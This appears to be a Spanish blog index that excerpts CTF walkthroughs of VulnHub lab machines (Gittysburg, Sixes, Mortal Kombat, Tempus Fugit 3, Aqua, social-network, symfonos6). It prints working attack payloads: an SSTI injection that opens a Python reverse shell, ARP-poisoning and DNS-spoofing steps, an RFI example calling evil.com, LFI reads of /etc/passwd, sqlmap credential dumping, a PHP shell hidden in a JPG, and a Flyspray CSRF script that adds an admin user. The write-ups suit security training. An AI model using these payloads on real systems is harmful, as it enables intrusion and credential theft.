Entradas

GITTYSBURG: 1 : gitlab+bof shellcode jmpesp

 https://www.vulnhub.com/entry/gittysburg-1,271/ Funciona mejor con vmware y no siempre activa el puerto 8261. Reiniciar varias veces. ┌──(kali㉿kali)-[~/gittisburg] └─$ nmap 192.168.2.7 -p- Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-08 12:35 EST Nmap scan report for gittysburg.home (192.168.2.7) Host is up (0.0015s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT     STATE SERVICE 22/tcp   open  ssh 80/tcp   open  http 8060/tcp open  aero 8261/tcp open  unknown 9094/tcp open  unknown Nmap done: 1 IP address (1 host up) scanned in 5.31 seconds                                                                                                               - En 80 tenemos un gitlab . Con fuzz sacamos folder root y podemos ver los proyectos de " david ". En el puerto 8261 tenemos un shell pero necesitamos las claves. En el proyecto rash del gitlab encontramos el binario y en /root/jeebs-v2/blob/master/  lo que parece el código fuente server.c . La flag1  flag

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web application   - Buy food to my cat :3 shellmates{5c6b5e84ab3fa94257bdce66b9c1c200} 233 bytes transferred Probamos distintos fuzzers pero como dice la nota no funci

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N

TEMPUS FUGIT: 3: ssti, sqlcipher, proxychains, sftp, pyotp

Máquina muy recomendable. This is an hard, real life box, created by @4nqr34z and @theart42 to be used as a CTF challenge on Bsides Newcastle 23. november 2019 and released on Vulnhub the same day. In Tempus Fugit 3, the idea is still, like in the first two challenges; to create something “out of the ordinary”. Aprendizaje avanzado. No pongo las flags. 1. Se trata de un  Server: nginx/1.14.2 Después de fuzzear un poco probamos inyección ssti y funciona http://tf3/{{7*7}} antes de que redirija observamos que muestra un not found tf3/49 Por lo tanto ssti attack reverse   con burp inyectamos  GET /{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.2.84\",9990));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);pty.spawn(\&quo

AQUA: 1 lfi, port knocking, BOF ret2lib

  https://www.vulnhub.com/entry/aqua-1,419/ Pantalla inicial: Help me! My computer has been hacked by Megumin and I have lost access to my computer password! If you help me, I'll tell everything about Megumin so you can help me to hack her back. Please?? ... 1. Pulsamos en yes y nos da unas credenciales de megumin que no sabemos cómo usarlas. Tenemos dos posibilidades: por el puerto ftp que está filtrado o por alguna página de login oculta.  2. Usando un fuzzer encontramos login.php y accedemos al diario secreto de megumin en home.php. Tenemos lfi /home.php?showcase=../../../../etc/passwd 3. A partir de aquí hay que ir revisando archivos de configuración o buscar en el home. El hecho de que el puerto ftp aparezca filtrado nos indica la posibilidad de un port knocking. El archivo donde mirar es ../../../../../etc/knockd.conf [FTP] sequence = 1234:tcp,5678:tcp,9012:tcp 4. Activamos knock ip 1234:tcp 5678:tcp 9012:tcp y comprobamos que ftp se activa con nmap. Entramos en ftp con las

Breaking social-network: Hard XMLRPCServer bof pwntools socat

Imagen
  https://www.vulnhub.com/entry/boredhackerblog-social-network-20,455/ You have been given access to a dev server. The current devs use many custom tools and scripts that you'll have to review and attack. Difficulty: Hard Tasks involved: port scanning webapp attacks code review custom bruteforcing reverse engineering buffer overflow exploitation 1. en el puerto 80 encontramos un login probamos inyección sql con sqlmap y sacamos las credenciales de admin.  sqlmap -u http://192.168.2.44/ --data 'useremail=a%40b.com&userpass=1&login=Login' --dbs A partir de aquí la idea es cargar un shell en la imagen profile o en un post . Al final funciona por post cargando un jpg generado con https://github.com/BlackFan/jpg_payload/blob/master/jpg_payload.php y con extensión php. www-data@socnet2:/home/socnet$  2. Una vez dentro como apache encontramos el script python que gestiona el puerto 8000 donde funciona un basehttp/0.3 python/2.7.15rc1 . De los posts de admin anteriores tene

symfonos6: flyspray, gitea, go

 https://www.vulnhub.com/entry/symfonos-61,458/ Difficulty: intermediate-hard 1- en 80 buscamos y tenemos flyspray . Creamos un usuario test y aplicamos exploit  https://www.exploit-db.com/exploits/41918 https://www.youtube.com/watch?v=eCf9a0QpnPs creamos script js var tok = document.getElementsByName('csrftoken')[0].value; var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">' txt += '<input type="hidden" name="action" value="admin.newuser"/>' txt += '<input type="hidden" name="do" value="admin"/>' txt += '<input type="hidden" name="area" value="newuser"/>' txt += '<input type="hidden" name="user_name" value="hacker"/>' txt += '<input type="hidden" name="csrftoken" value="' + tok + '